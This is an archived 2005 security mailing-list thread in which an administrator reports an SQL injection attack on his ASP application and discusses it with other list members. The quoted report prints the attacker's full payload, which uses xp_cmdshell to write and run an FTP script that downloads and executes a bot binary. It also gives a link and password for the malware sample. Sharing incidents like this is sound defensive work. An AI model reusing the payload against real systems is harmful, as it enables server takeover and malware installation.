'Re: SQL injection ... another attack'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       incidents
Subject:    Re: SQL injection ... another attack
From:       "Maxime Ducharme" <mducharme () cybergeneration ! com>
Date:       2005-01-20 20:49:39
Message-ID: 130701c4ff31$8f67ee50$b000a8c0 () cybergeneration ! com
[Download RAW message or body]


I must first thank everybody who replied,
I received alot of useful information.

This attack have been detected by our home-made
webapp security monitoring tool

How can you tell this worked ? I can ensure
it didnt.

Our firewalls also restrict outbound access,
so IRC communication couldnt work. Our servers
simply does not have Internet access, they
can only reply to opened TCP connection on
port 80.

Database Server is back-end, private IP on separate
VLAN without gateway set in IP config.

Ciao

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

----- Original Message ----- 
From: "Harlan Carvey" <keydet89@yahoo.com>
To: "gaurav kumar" <gkverma@gmail.com>; "Maxime Ducharme"
<mducharme@cybergeneration.com>
Cc: <incidents@securityfocus.com>
Sent: Thursday, January 20, 2005 1:57 PM
Subject: Re: SQL injection ... another attack


> I think the real issue here is that the SQL Injection
> worked....
>
>
> --- gaurav kumar <gkverma@gmail.com> wrote:
>
> > my VirusScan (network associates) detected it as
> > W32/Sdbot.worm.gen
> >
> >
> > On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme
> > <mducharme@cybergeneration.com> wrote:
> > >
> > > Hi to the list
> > >
> > > today we received the same SQL injection attack
> > > on the same URL :
> > >
> > > IP : 24.1.139.29
> > > (c-24-1-139-29.client.comcast.net)
> > > User Agent : none sent
> > > HTTP Verb : GET /theasppage.asp?anID=
> > > Attack :
> > > 377';exec MASTER..xp_cmdshell 'mkdir
> > %systemroot%\system32\Macromed\lolx\';
> > > exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo USER chadicka
> > r0ckpaul >>
> > > %systemroot%\system32\macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo binary >>
> > > %systemroot%\system32\macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo get lol.exe
> > > %systemroot%\system32\Macromed\lolx\arcdlrde.exe
> > >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'echo quit >>
> > > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell
> > > 'ftp.exe -i -n -v
> > -s:%systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell 'del
> > %systemroot%\system32\Macromed\lolx\blah.jkd';
> > > exec MASTER..xp_cmdshell
> > >
> > '%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--
> > >
> > > The lol.exe file can be found in this archive for
> > inspection :
> > >
> >
> http://www.cybergeneration.com/security/2005.01.19/lol.zip
> > > zip pass is das978tewa234
> > >
> > > Norton with definitions of 12 jan. doesnt find
> > anything
> > > suspicious.
> > >
> > > I'm interested if someone do an analysis on this
> > file.
> > >
> > > Have a nice day
> > >
> > > Maxime Ducharme
> > > Programmeur / Spécialiste en sécurité réseau
> > >
> > > ----- Original Message -----
> > > From: "Maxime Ducharme"
> > <mducharme@cybergeneration.com>
> > > To: <full-disclosure@lists.netsys.com>; "General
> > DShield Discussion List"
> > > <list@lists.dshield.org>;
> > <incidents@securityfocus.com>
> > > Sent: Wednesday, January 05, 2005 12:22 PM
> > > Subject: SQL injection worm ?
> > >
<snipped>

[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic